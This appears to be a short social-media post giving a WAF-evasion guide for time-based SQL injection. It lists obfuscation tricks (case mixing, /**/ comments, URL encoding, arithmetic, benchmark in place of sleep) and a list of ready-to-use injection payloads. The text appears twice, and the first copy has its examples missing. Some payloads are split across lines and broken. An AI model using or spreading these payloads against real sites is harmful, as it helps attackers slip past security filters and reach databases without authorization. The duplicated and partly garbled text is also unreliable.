Bypass waf firewall
To increase the likelihood of a successful injection test using these random payloads, you can follow some approaches and techniques that vary the payloads based on how the database servers interpret the queries.
Using Substitutions in Keywords
You can substitute words like or, xor, and || to disable security filters.
Example:
. Entering camouflaged spaces and comments
Some filters may ignore comments or spaces. You can add comments like /**/ or use different types of spaces.
Example:
using mathematical expressions
Sometimes it can be useful to use mathematical expressions to avoid filters that look for explicit numbers.
Example:
Changing the simple formula
The formula for simple payloads can also be changed.
Example:
Mixing multiple payloads in a single request
You can combine two or more payloads to increase complexity.
Example:
Entering different parentheses
Some databases handle parentheses differently. You can use alternate parentheses to bypass filters.
Example:
Using Uncommon Phrases
Using uncommon or advanced phrases like benchmark instead of sleep may help avoid detection.
Example:
Logical Construct Tests
You can also test loads with logical constructs.
Example:
Complete
example:
Here are some more random payloads to use in your SQL injection test:
Combine some of these payloads:
You can mix payloads together to make the attack
more complex:
These payloads randomly diversify attacks that may pass through some filters or protection methods.
#waf #sql
To increase the likelihood of a successful injection test using these random payloads, you can follow some approaches and techniques that vary the payloads based on how the database servers interpret the queries.
Using Substitutions in Keywords
You can substitute words like or, xor, and || to disable security filters.
Example:
or sleep(4) ➔ oR sLeEP(4) or xor sleep(4)
. Entering camouflaged spaces and comments
Some filters may ignore comments or spaces. You can add comments like /**/ or use different types of spaces.
Example:
or sleep(4) ➔ or//sleep(4) or or sLeEp(//4)
using mathematical expressions
Sometimes it can be useful to use mathematical expressions to avoid filters that look for explicit numbers.
Example:
4 ➔ 6-2 or true+true
Changing the simple formula
The formula for simple payloads can also be changed.
Example:
sleep(4) ➔ sleep((4)) or benchmark(4)
Mixing multiple payloads in a single request
You can combine two or more payloads to increase complexity.
Example:
%27 or sleep(4) -- ➔ %27 oR sLeEP(4) || true+true --
4|0 or benchmark(4) ➔ (4|0) oR beNCHMark(/**/4)
Entering different parentheses
Some databases handle parentheses differently. You can use alternate parentheses to bypass filters.
Example:
or (sleep(4)) ➔ or %28sleep%2
84%29
Using Uncommon Phrases
Using uncommon or advanced phrases like benchmark instead of sleep may help avoid detection.
Example:
or sleep(4) ➔ or bench
mark(4)
Logical Construct Tests
You can also test loads with logical constructs.
Example:
or sleep(4) ➔ or (sleep(4) && true=true)
Complete
example:
' oR sLeEP(/**/4) || true+true --
Here are some more random payloads to use in your SQL injection test:
'%27 OR sleep(4) --
%28%29 XOR sLeEp(4) --
(4|0) oR beNCHMark(/**/4) --
' OR 6-2=4 || sleep(4) --
') OR true+true=sleep(4) --
%27 oR sLeEp(4) = (true) --
' xor sLeEP((4)) --
%27 = (1=(sleep(4))) --
%28%29 OR beNcHmArk(4) --
' XOR sleep(/**/4)
|| -true*4 --
Combine some of these payloads:
You can mix payloads together to make the attack
more complex:
'%27 OR sleep(4) || (true=true) -- ')
These payloads randomly diversify attacks that may pass through some filters or protection methods.
#waf #sql
❤6👍3